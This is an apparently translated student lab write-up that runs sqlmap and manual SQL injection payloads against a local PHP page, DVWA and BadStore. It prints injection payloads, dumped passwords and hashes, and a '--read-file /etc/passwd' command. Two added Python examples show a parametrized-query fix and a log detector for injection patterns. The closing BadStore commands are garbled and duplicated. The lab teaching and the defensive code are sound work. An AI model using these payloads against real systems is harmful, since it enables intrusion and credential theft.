
SQL Injection 2 Map

Contents
1. Local Attack
   A) DB Server and Version
   B) DB Name
   C) Tables
   D) Columns
   E) Table Contents
   F) Remaining Databases
   G) MySQL Users
2. DVWA
   Installation
3. BadStore
   A) DB Server and Version
   B) DB Name
   C) Tables
   D) Columns
   E) Remaining Databases
4. Acunetix
   A) DB Server and Version
   B) DB Name
   C) Tables
   D) Columns

Iván Martín Valderas Page 2


SQL Injection

1. Local Attack
We are going to carry out a SQL injection attack on our earlier page, the one that ran a query against our MySQL database.

Its location is: http://localhost/ejerPHP/SQL_Injection/consulta.php

For this we will use the SQLMap program from the console.

A) DB Server and Version

First we find out the type of database server and its version; for this we use sqlmap's -b option:

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consulta.php?id=1 -b

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 13:57:25

[13:57:26] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as session file
[13:57:26] [INFO] testing connection to the target url
[13:57:26] [INFO] testing if the url is stable, wait a few seconds
[13:57:27] [INFO] url is stable
[13:57:27] [INFO] testing if GET parameter 'id' is dynamic
[13:57:27] [INFO] confirming that GET parameter 'id' is dynamic
[13:57:27] [INFO] GET parameter 'id' is dynamic
[13:57:28] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable
[13:57:28] [INFO] testing sql injection on GET parameter 'id'
[13:57:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:57:28] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[13:57:28] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[13:57:28] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[13:57:28] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[13:57:28] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[13:57:28] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[13:57:28] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[13:57:28] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[13:57:28] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[13:57:38] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[13:57:38] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[13:57:38] [INFO] target url appears to be UNION injectable with 3 columns
[13:57:38] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] Y

sqlmap identified the following injection points with a total of 29 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 6656=6656

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNULL(CAST(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,58)), NULL, NULL#

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1 AND SLEEP(5)
---

[13:57:44] [INFO] the back-end DBMS is MySQL
[13:57:44] [INFO] fetching banner
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5.0.11
banner: '5.5.8'

[13:57:44] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\output\localhost'

[*] shutting down at: 13:57:44

In this step the program has tested each of the possibilities in order to find out the server type:

[…]

'MySQL > 5.0.11
'PostgreSQL > 8.1
'Microsoft SQL Server
[…]

After these operations, we find the version: MySQL 5.0.11


B) DB Name

This is the first step in extracting all the information we can from our victim, since from here on we will go step by step deeper into the DB.

We extract the name of the database that the query we made refers to, that is, the current database, with the --current-db command:

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consulta.php?id=1 --current-db

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 14:01:02

[14:01:02] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as session file
[14:01:02] [INFO] resuming injection data from session file
[14:01:02] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[14:01:02] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 6656=6656

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNULL(CAST(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,58)), NULL, NULL#

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1 AND SLEEP(5)
---

[14:01:03] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5.0.11
[14:01:03] [INFO] fetching current database
current database: 'asir1'
[14:01:03] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\output\localhost'

[*] shutting down at: 14:01:03

The database name is "asir1".


C) Tables:
Once we have the database name, we can proceed to view the tables it holds, using the --tables command and -D asir1 for the name we obtained earlier:

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consulta.php?id=1 --tables -D asir1

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 14:04:48

[14:04:48] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as session file
[14:04:48] [INFO] resuming injection data from session file
[14:04:48] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[14:04:48] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 6656=6656

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNULL(CAST(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,58)), NULL, NULL#

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1 AND SLEEP(5)
---

[14:04:49] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5.0.11
[14:04:49] [INFO] fetching tables for database 'asir1'
[14:04:49] [INFO] the SQL query used returns 1 entries
Database: asir1
[1 table]
+----------+
| usuarios |
+----------+
[14:04:49] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\output\localhost'

[*] shutting down at: 14:04:49

We obtain one table: usuarios


D) Columns:
C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consulta.php?id=1 --columns -T usuarios -D asir1

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 14:06:30

[14:06:30] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as session file
[14:06:30] [INFO] resuming injection data from session file
[14:06:30] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[14:06:30] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 6656=6656

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNULL(CAST(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,58)), NULL, NULL#

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1 AND SLEEP(5)
---

[14:06:31] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5.0.11
[14:06:31] [INFO] fetching columns for table 'usuarios' on database 'asir1'
[14:06:31] [INFO] the SQL query used returns 3 entries
Database: asir1
Table: usuarios
[3 columns]
+----------+------------------+
| Column   | Type             |
+----------+------------------+
| id       | int(10) unsigned |
| nonmbre  | varchar(50)      |
| password | varchar(50)      |
+----------+------------------+
[14:06:31] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\output\localhost'

[*] shutting down at: 14:06:31

We have obtained the column names and their types.


E) Table Contents:

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consulta.php?id=1 --dump -T usuarios -D asir1

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 14:07:28

[14:07:28] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as session file
[14:07:28] [INFO] resuming injection data from session file
[14:07:28] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[14:07:28] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 6656=6656

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNULL(CAST(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,58)), NULL, NULL#

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1 AND SLEEP(5)
---

[14:07:28] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5.0.11
[14:07:29] [INFO] fetching columns for table 'usuarios' on database 'asir1'
[14:07:29] [INFO] read from file 'C:\sqlmap-0.9\sqlmap\output\localhost\session': id, int(10) unsigned, nonmbre, varchar(50), password, varchar(50)
[14:07:29] [INFO] fetching entries for table 'usuarios' on database 'asir1'
[14:07:29] [INFO] the SQL query used returns 3 entries
Database: asir1
Table: usuarios
[3 entries]
+----+---------+----------+
| id | nonmbre | password |
+----+---------+----------+
| 2  | ivan    | ivanasir |
| 3  | luci    | luciasir |
| 1  | root    | asir2012 |
+----+---------+----------+

Now we have the complete usuarios table of the asir1 database.


F) Remaining Databases:

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consulta.php?id=1 --dbs

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 14:08:22

[14:08:22] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as session file
[14:08:22] [INFO] resuming injection data from session file
[14:08:22] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[14:08:22] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 6656=6656

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNULL(CAST(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,58)), NULL, NULL#

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1 AND SLEEP(5)
---

[14:08:22] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5.0.11
[14:08:22] [INFO] fetching database names
[14:08:22] [INFO] the SQL query used returns 8 entries
available databases [8]:
[*] asir1
[*] cdcol
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
[*] webauth

G) MySQL Users:

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consulta.php?id=1 --users

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 14:10:03

[14:10:03] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as session file
[14:10:03] [INFO] resuming injection data from session file
[14:10:03] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[14:10:03] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 6656=6656

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNULL(CAST(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,58)), NULL, NULL#

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1 AND SLEEP(5)
---

[14:10:03] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5.0.11
[14:10:03] [INFO] fetching database users
[14:10:03] [INFO] the SQL query used returns 58 entries
database management system users [4]:
[*] ''@'localhost'
[*] 'pma'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'localhost'


There is only one root user. Here lies one of the problems.

We are using the root user that MySQL ships with by default to access the database from PHP.

If we use the root user for our SQL statements, that means we can make calls to the system:

This way we could find out the passwords in use, for example on UNIX:


C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consulta.php?id=1 --read-file /etc/passwd
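As an added example (not part of the original exercise, and written in Python with SQLite standing in for MySQL), here is why consulta.php answers sqlmap's boolean-based test and what removes the problem: a query that pastes the id parameter into the SQL text responds differently to the page's payload id=1 AND 6656=6656 and to a constructed false counterpart, while a query that validates the parameter as an integer and binds it with a placeholder responds the same way to both. The usuarios rows and the function names consulta_vulnerable and consulta_parametrizada are constructed to mirror the dump above; they are not the exercise's own PHP.

```python
import sqlite3

# Constructed stand-in for the asir1.usuarios table dumped above (SQLite instead of
# MySQL). The column name "nonmbre" is kept exactly as the sqlmap output shows it.
SCHEMA = """
CREATE TABLE usuarios (
    id       INTEGER PRIMARY KEY,
    nonmbre  VARCHAR(50),
    password VARCHAR(50)
);
INSERT INTO usuarios VALUES (1, 'root', 'asir2012');
INSERT INTO usuarios VALUES (2, 'ivan', 'ivanasir');
INSERT INTO usuarios VALUES (3, 'luci', 'luciasir');
"""

# The payload sqlmap reported for the boolean-based blind test, plus a constructed
# false counterpart: the two requests differ only in the truth of the appended clause.
TRUE_PAYLOAD = "1 AND 6656=6656"
FALSE_PAYLOAD = "1 AND 6656=6657"


def open_db():
    """In-memory database seeded with the constructed usuarios rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def consulta_vulnerable(conn, raw_id):
    """Hypothetical equivalent of consulta.php: the id parameter is pasted into the
    SQL text, so anything after the number becomes part of the WHERE clause."""
    sql = "SELECT id, nonmbre FROM usuarios WHERE id = " + raw_id
    return conn.execute(sql).fetchall()


def consulta_parametrizada(conn, raw_id):
    """Hardened form: the parameter must be an integer, and it is bound through a
    placeholder, so the driver never interprets it as SQL."""
    try:
        id_value = int(raw_id)
    except ValueError:
        raise ValueError("id must be an integer") from None
    return conn.execute(
        "SELECT id, nonmbre FROM usuarios WHERE id = ?", (id_value,)
    ).fetchall()


def blind_oracle_present(conn, query_fn):
    """True when the true and false payloads produce different responses, which is
    the signal sqlmap's 'AND boolean-based blind' test needs in order to extract data."""
    def respond(payload):
        try:
            return ("rows", query_fn(conn, payload))
        except (ValueError, sqlite3.Error) as exc:
            return ("error", type(exc).__name__)
    return respond(TRUE_PAYLOAD) != respond(FALSE_PAYLOAD)


if __name__ == "__main__":
    db = open_db()
    print("concatenated query leaks an oracle:", blind_oracle_present(db, consulta_vulnerable))      # True
    print("parametrized query leaks an oracle:", blind_oracle_present(db, consulta_parametrizada))   # False
```

The same fix applies to the PHP page: cast the id to an integer and use a prepared statement, and run the application under a MySQL account that only has the privileges the page needs rather than root.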
2. DVWA

Damn Vulnerable Web App Installation


[[The folder must be in htdocs]] Default username = admin

Default password = password

To access it, type in the browser:

http://127.0.0.1/dvwa/

We create the database


We check that the vulnerability exists:

1' or '1'='1' union select password, first_name from users where first_name='admin

ID: 1' or '1'='1' union select password, first_name from users where first_name='admin
First name: 5f4dcc3b5aa765d61d8327deb882cf99
Surname: admin

http://es.scribd.com/doc/48652427/Practica-SQL-Injection-en-DVWA


We have obtained a password, although as we can see it is encoded, so we will use a web utility to decode it.

Let's try to extract all the passwords at once, since with the previous code we would have to do it one by one:

1' or '1'='1' union select first_name, password from users where '1'='1
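As an added defensive counterpart (not part of the original write-up), a Python scanner that runs over Apache access-log lines and flags the payload shapes seen in these exercises: UNION ... SELECT, the AND n=n and ' or '1'='1 tautologies, SLEEP(n), CHAR(...) digit lists, and sqlmap's own User-Agent. The log lines, IP, timestamps, DVWA path and User-Agent strings are constructed for the example; only the payload text comes from the sessions above.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format access-log lines. The query strings carry the
# payloads seen in this write-up, URL-encoded the way a browser or sqlmap sends them
# (the UNION payload is shortened); everything else on each line is made up.
SAMPLE_LOG = r'''
127.0.0.1 - - [12/Mar/2012:13:57:20 +0100] "GET /ejerPHP/SQL_Injection/consulta.php?id=1 HTTP/1.1" 200 412 "-" "Mozilla/5.0"
127.0.0.1 - - [12/Mar/2012:13:57:28 +0100] "GET /ejerPHP/SQL_Injection/consulta.php?id=1%20AND%206656%3D6656 HTTP/1.1" 200 412 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"
127.0.0.1 - - [12/Mar/2012:13:57:38 +0100] "GET /ejerPHP/SQL_Injection/consulta.php?id=1%20AND%20SLEEP%285%29 HTTP/1.1" 200 412 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"
127.0.0.1 - - [12/Mar/2012:13:57:40 +0100] "GET /ejerPHP/SQL_Injection/consulta.php?id=-8382%20UNION%20ALL%20SELECT%20CONCAT%28CHAR%2858%2C106%2C114%2C107%2C58%29%29%2C%20NULL%2C%20NULL%23 HTTP/1.1" 200 612 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"
127.0.0.1 - - [12/Mar/2012:14:30:02 +0100] "GET /dvwa/vulnerabilities/sqli/?id=1%27+or+%271%27%3D%271%27+union+select+first_name%2C+password+from+users+where+%271%27%3D%271&Submit=Submit HTTP/1.1" 200 1890 "http://127.0.0.1/dvwa/" "Mozilla/5.0"
'''

# Apache "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Payload shapes taken from the sessions above; each rule runs on the URL-decoded request.
RULES = {
    "union_select": re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I),
    # "AND 6656=6656" style numeric tautology, or the quoted "' or '1'='1" form used in DVWA
    "boolean_tautology": re.compile(r"\b(?:and|or)\s+(\d+)\s*=\s*\1\b|'\s*or\s*'1'\s*=\s*'1", re.I),
    "time_based": re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I),
    "char_encoding": re.compile(r"\bchar\s*\(\s*\d+(?:\s*,\s*\d+)+\s*\)", re.I),
}
SQLMAP_UA = re.compile(r"^sqlmap/", re.I)


def classify_line(line):
    """Parse one log line; return a record whose 'hits' lists the rules that matched
    (empty list when clean), or None when the line is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = unquote_plus(m["path"])  # %27 -> ', %28 -> (, + -> space
    hits = [name for name, rx in RULES.items() if rx.search(decoded)]
    if SQLMAP_UA.search(m["ua"]):
        hits.append("sqlmap_user_agent")
    return {"ip": m["ip"], "ts": m["ts"], "path": decoded, "hits": hits}


def scan_log(text):
    """Return only the parsed records that triggered at least one rule."""
    records = (classify_line(line) for line in text.strip().splitlines())
    return [r for r in records if r is not None and r["hits"]]


def count_by_ip(records):
    """Flagged requests per source address, a quick way to spot an automated scan."""
    counts = {}
    for r in records:
        counts[r["ip"]] = counts.get(r["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    for r in scan_log(SAMPLE_LOG):
        print(r["ts"], r["ip"], ",".join(r["hits"]), r["path"])
```

Note that the User-Agent rule only catches a scanner that keeps its default header; the payload rules are the ones that still fire when it is changed.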


3. BadStore

If we type a double quote (") in the search field we get a response from the SQL server, so we can anticipate the SQL vulnerability.

As with the first exercise, we will follow the same steps.

A) DB Server and Version

C:\sqlmap-0.9\sqlmap>sqlmap.py -u "http://192.168.13.164/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" -b

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 10:02:41

[10:02:41] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\session' as session file
[10:02:41] [INFO] testing connection to the target url
[10:02:41] [INFO] testing if the url is stable, wait a few seconds
[10:02:42] [INFO] url is stable
[10:02:42] [INFO] testing if GET parameter 'searchquery' is dynamic
[10:02:43] [WARNING] GET parameter 'searchquery' is not dynamic
[10:02:43] [INFO] heuristic test shows that GET parameter 'searchquery' might be injectable (possible DBMS: MySQL)
[10:02:43] [INFO] testing sql injection on GET parameter 'searchquery'
[10:02:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:02:44] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[10:02:45] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[10:02:45] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
parsed error message(s) showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
[10:02:52] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[10:02:57] [INFO] target url appears to be UNION injectable with 4 columns
[10:02:57] [INFO] GET parameter 'searchquery' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'searchquery' is vulnerable. Do you want to keep testing the others? [y/N] y

Here it has warned us that the 'searchquery' parameter is vulnerable, that is, the search box where we earlier entered the double quotes (") is backed by a GET parameter that will let us insert SQL statements there; it also asks us whether we want to look for other vulnerable parameters.

[10:03:05] [INFO] testing if GET parameter 'action' is dynamic
[10:03:05] [INFO] confirming that GET parameter 'action' is dynamic
[10:03:05] [INFO] GET parameter 'action' is dynamic
[10:03:05] [WARNING] heuristic test shows that GET parameter 'action' might not be injectable
[10:03:05] [INFO] testing sql injection on GET parameter 'action'
[10:03:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:03:06] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[10:03:07] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[10:03:07] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[10:03:08] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[10:03:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:03:17] [WARNING] GET parameter 'action' is not injectable
[10:03:17] [INFO] testing if GET parameter 'x' is dynamic
[10:03:17] [WARNING] GET parameter 'x' is not dynamic
[10:03:17] [WARNING] heuristic test shows that GET parameter 'x' might not be injectable
[10:03:17] [INFO] testing sql injection on GET parameter 'x'
[10:03:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:03:19] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[10:03:19] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[10:03:20] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[10:03:20] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[10:03:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:03:31] [WARNING] GET parameter 'x' is not injectable
[10:03:31] [INFO] testing if GET parameter 'y' is dynamic
[10:03:31] [WARNING] GET parameter 'y' is not dynamic
[10:03:31] [WARNING] heuristic test shows that GET parameter 'y' might not be injectable
[10:03:31] [INFO] testing sql injection on GET parameter 'y'
[10:03:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:03:32] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[10:03:33] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[10:03:33] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[10:03:34] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[10:03:39] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:03:44] [WARNING] GET parameter 'y' is not injectable
sqlmap identified the following injection points with a total of 380 HTTP(s) requests:
---
Place: GET
Parameter: searchquery
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: searchquery=hi' UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,118,116,114,58),CHAR(101,111,97,108,121,122,120,65,111,103),CHAR(58,114,101,109,58))# AND 'bYfh'='bYfh&action=search&x=0&y=0
---

[10:03:45] [INFO] testing MySQL
[10:03:45] [INFO] confirming MySQL
[10:03:45] [INFO] the back-end DBMS is MySQL
[10:03:45] [INFO] fetching banner
web application technology: Apache 1.3.28
back-end DBMS: MySQL < 5.0.0
banner: '4.1.7-standard'

[10:03:45] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164'

[*] shutting down at: 10:03:45

B) DB Name
C:\sqlmap-0.9\sqlmap>sqlmap.py -u "http://192.168.13.164/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" --current-db

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 10:12:35

[10:12:35] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\session' as session file
[10:12:35] [INFO] resuming injection data from session file
[10:12:35] [INFO] resuming back-end DBMS 'mysql 4' from session file
[10:12:35] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: searchquery
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: searchquery=hi' UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,118,116,114,58),CHAR(101,111,97,108,121,122,120,65,111,103),CHAR(58,114,101,109,58))# AND 'bYfh'='bYfh&action=search&x=0&y=0
---

[10:12:35] [INFO] the back-end DBMS is MySQL
web application technology: Apache 1.3.28
back-end DBMS: MySQL 4
[10:12:35] [INFO] fetching current database
current database: 'badstoredb'
[10:12:36] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164'

[*] shutting down at: 10:12:36

The DB name is badstoredb

C) Tables
C:\sqlmap-0.9\sqlmap>sqlmap.py -u "http://192.168.13.164/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" --tables -D badstoredb

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 10:20:13

[10:20:13] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\session' as session file
[10:20:13] [INFO] resuming injection data from session file
[10:20:13] [INFO] resuming back-end DBMS 'mysql 4' from session file
[10:20:13] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: searchquery
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: searchquery=hi' UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,118,116,114,58),CHAR(101,111,97,108,121,122,120,65,111,103),CHAR(58,114,101,109,58))# AND 'bYfh'='bYfh&action=search&x=0&y=0
---

[10:20:14] [INFO] the back-end DBMS is MySQL
web application technology: Apache 1.3.28
back-end DBMS: MySQL 4
[10:20:14] [ERROR] information_schema not available, back-end DBMS is MySQL < 5.0
do you want to use common table existance check? [Y/n/q] y
[10:20:21] [INFO] checking table existence using items from 'C:\sqlmap-0.9\sqlmap\txt\common-tables.txt'
[10:20:21] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)]
[10:20:28] [WARNING] running in a single-thread mode. This could take a while.
[10:27:14] [INFO] retrieved: itemdb

Database: badstoredb
[1 table]
+--------+
| itemdb |
+--------+

[10:27:14] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164'

[*] shutting down at: 10:27:14

The table name is itemdb


D) Columns
C:\sqlmap-0.9\sqlmap>sqlmap.py
C:\sqlmap-0.9\sqlmap>sqlm ap.py -u "http://192.168.13.164/cgi-bin/bads
"http://192.168.13.164/cgi-bin/badstore.cgi?se
tore.cgi?se
archquery=hi&action=search&x=
archquery=hi&action=search&x=0&y=0"
0&y=0" --columns -T itemdb -D badsto
badstoredb
redb
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 10:29:00

